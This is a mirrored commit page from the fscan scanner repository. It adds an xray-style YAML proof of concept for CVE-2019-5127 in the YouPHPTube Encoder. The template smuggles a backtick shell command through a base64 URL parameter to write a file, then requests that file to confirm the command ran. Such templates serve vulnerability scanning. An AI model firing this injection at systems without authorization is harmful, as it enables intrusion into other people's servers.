mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-26 21:21:53 +08:00
优化xray解析模块,支持groups、新增poc
This commit is contained in:
@@ -0,0 +1,20 @@
|
||||
name: poc-yaml-youphptube-encoder-cve-2019-5127
|
||||
set:
|
||||
fileName: randomLowercase(4) + ".txt"
|
||||
content: randomLowercase(8)
|
||||
payload: urlencode(base64("`echo " + content + " > " + fileName + "`"))
|
||||
rules:
|
||||
- method: GET
|
||||
path: /objects/getImage.php?base64Url={{payload}}&format=png
|
||||
follow_redirects: true
|
||||
expression: |
|
||||
response.status == 200
|
||||
- method: GET
|
||||
path: /objects/{{fileName}}
|
||||
follow_redirects: true
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(bytes(content))
|
||||
detail:
|
||||
author: 0x_zmz(github.com/0x-zmz)
|
||||
links:
|
||||
- https://xz.aliyun.com/t/6708
|
||||
Reference in New Issue
Block a user